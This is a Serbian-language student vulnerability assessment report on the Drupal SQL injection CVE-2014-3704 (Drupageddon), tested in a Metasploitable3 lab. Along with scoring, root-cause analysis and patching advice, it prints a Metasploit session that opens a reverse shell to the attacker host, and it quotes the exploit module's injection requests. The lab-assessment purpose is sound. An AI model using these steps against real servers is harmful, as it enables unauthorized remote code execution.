Vulnerability Assessment Report

Ime i prezime: Nemanja Dutina

Tim: 5

Datum: 26.10.2024.

Scan Tool: Nessus (10.8.3)
Test okruženje: Metasploitable3

1. Enumeracija CVE-a

• CVE ID: CVE-2014-3704

• Opis:

Unutar Drupal core modula, postoji API za rad sa bazom podataka. Unutar tog API, se nalazi funkcija expandArguments. Funkcija ne proverava podatke dobijene od korisnika pre konstrukcije pripremljenih upita, te je moguće izvršiti SQL injekciju. Unutar nje, koriste se nazivi i vrednosti korisnički unesenih parametara, bez njihove prethodne provere. Na taj način, napadač može, promenom naziva parametara, izvršiti SQL injekciju koja može dovesti i do izvršavanja koda na serverskoj mašini. Ranjivost se nalazi u Drupal verzijama 7.x pre 7.32. Poznata je i pod nazivom *Drupageddon*. Na skeniranoj mašini, na portu 80, postoji *http* servis koji koristi ranjivu verziju Drupala.

2. CVSS skor

- CVSS skor (numerička vrednost): 7.5
- Vektor:

```
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
```

- AV:N Attack Vector: Network (eksploatacija preko mreže, napadač ne mora fizički pristupiti sistemu)
- AC:L Attack Complexity: Low (napad se lako izvršava, postoje gotovi eksploiti, nije potrebno veliko tehničko znanje)
- PR:N Privileges Required: None (korisnik ne mora imati posebne privilegije, što znači da ranjivost može biti iskorišćenja bez potrebe za prethodnom autentifikacijom ili pristup adminovom nalogu)

- UI:N User Interaction: None (ranjivost se može eksploitovati slanjem zahteva ka sistemu bez potrebe za direktnom interakcijom sa sistemom)
- S:U Scope: Unchanged (opseg ranjivosti ostaje isti, napadač može da utiče samo na servis koji koristi ranjivu verziju drupala)
- C:H Confidentiality: High (napadač može pristupiti osetljivim informacijama)
- I:H Integrity: High (napadač može izmeniti podatke, čime je narušen njihov integritet)
- A:H Availability: High (ranjivost može dovesti do izvršavanja koda na mašini servera, čime napadač može uticati na dostupnost sistema)

Opravdanje:

Ova ranjivost može dovesti do manipulacije osetljivih podataka, čime se narušava privatnost korisnika. Kako nije potrebna nepostedna interakcija korisnika sa sistemom, te već postojeći eksploiti koje je lako koristiti, čine ovu ranjivost veoma opasnom. Ta kombinacija, iskorišćavanja ranjivosti bez mnogo truda i tehničkog znanja, kao i potencijalnog izvršavanja koda na serverskoj mašini, što može dovesti i do iskorišćavanja reverse shell-a, daju ranjivosti visok CVSS skor.

3. Dostupnost eksploita

• **Postoji javno dostupan eksploit:** Da, postoji više javno dostupnih eksploita u okviru exploit database platforme. Pored toga, eksploit se može pronaći i u okviru metasploit radnog okvira, te je on korišćen kako bi se ranjivost eksploatisala.

Opis eksploita:

U okviru metasploit radnog okvira postoji eksploit pod nazivom *multi/http/drupal_drupageddon*. Ovaj eksploit koristi drupalov keš u koji ubacuje zlonameran kod, odakle se kasnije izvršava. Na slici je prikazana upotreba eksploita za dobijanje reverse shell-a. Kako bi se eksploit iskoristio, potrebno je postaviti ip adresu žrtve, uri do servisa i koda koji se šalje pri eksploitu. Za ovaj primer je iskorišćen kod za dobijanje reverse shell-a (*php/reverse_perl*). Kako bi se prikazala uspešnost eksploita, izvršena je komanda whoami nakon dobijanja reverse shell-a.

```
msf6 > use exploit/multi/http/drupal_drupageddon
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/drupal_drupageddon) > set rhost 172.28.128.3
rhost => 172.28.128.3
msf6 exploit(multi/http/drupal_drupageddon) > set targeturi /drupal/
targeturi => /drupal/
msf6 exploit(multi/http/drupal_drupageddon) > set lhost 172.28.128.1
lhost => 172.28.128.1
msf6 exploit(multi/http/drupal_drupageddon) > set payload php/reverse_perl
payload => php/reverse_perl
msf6 exploit(multi/http/drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:48716) at 2024-10-27 02:27:44 +0200
whoami
www-data
```

Napomena: Kako bi se pristupilo metasploit radnom okviru potrebno ga je prethodno preuzeti sa njihove zvanične stranice i instalirati (u okviru *Kali Linux* operativnog sistema, metasploit je već instaliran). Komanda kojom se pristupa metasploit konzoli je msfconsole.

Kod eksploita:

Eksploit koristi user/login endpoint kako bi uneo zlonamerni kod u keš. On se nalazi unutar imena parametra i oblika je name[0;#{sql}#], kao što je prikazano u listingu ispod. Drupal omogućava keširanje stanja forme, kako bi korisnik kasnije na efikasniji način mogao raditi sa formom. Svaka forma ima id (u listingu ispod form_id parametar), te kada se pošalje zahtev sa određenim id, Drupal proverava da li postoji keš pod tim id. Ovo omogućava da se najpre postavi keš forme, te kasnije post zahtevom sa istim id forme pokrene izvršavanje zlonamernog koda. Kompletan kod je moguće pronaći <u>ovde</u>.

```
send_request_cgi!({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'vars_post' => {
        # Don't use 'user_login_block' as it may be disabled.
        'form_id' => 'user_login',
        'form_build_id' => '',
        "name[0;#{sql}#]" => '',
        # This field must be located *after* the injection.
        "name[0]" => '',
        'op' => 'Log in',
        'pass' => Rex::Text.rand_text_alpha(8)
     },
      'vars_get' => {
       'q' => 'user/login'
    }, timeout=datastore['Wait'])
   # Trigger the malicious cache entry using its form ID.
    send_request_cgi!({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'vars_post' => {
        'form_id' => 'user_login',
        "form_build_id" => form_build_id,
        "name" => Rex::Text.rand_text_alpha(10),
        'op' => 'Log in',
        'pass' => Rex::Text.rand_text_alpha(10)
     },
      'vars_get' => {
        'q' => 'user/login'
      }
   })
```

4. Analiza uzroka (root cause)

• Uvođenje Greške (Commit/Verzija):

Ranjivost je uvedena u <u>commit-u</u> 24.12.2008. U okviru ovog commit-a je kreirana expandArguments funkcija, koja sadrži ranjiv kod. Commit je bio deo razvoja drupal verzije 7, a nalazi se unutar *Drupal 7.x-dev*.

Primer Koda (ako je primenljivo):

foreach (\$data as \$i => \$value) predstavlja liniju koda koja je ranjiva. Podaci dobijeni od korisnika se koriste bez provere, te ključevi unutar \$data mogu biti bilo šta. Kasnije je, prilikom commit-a skoro četiri godine kasnije - 15.10.2014, ova ranjivost rešena upotrebom foreach (array_values(\$data) as \$i => \$value) linije koda. Na ovaj način je onemogućeno napadačima da iskoriste naziv parametra za injekciju.

5. Preporuke za mitigaciju

- Da li je dostupan Vendor Fix ili patch: Da
- Mitigation Strategy:

Patch je moguće napraviti koristeći *drush* alat uz jednostavnu komandu:

drush pm-update drupal

Napomena: Komandu je potrebno izvršiti unutar korenskog direktorijuma u kom se nalazi drupal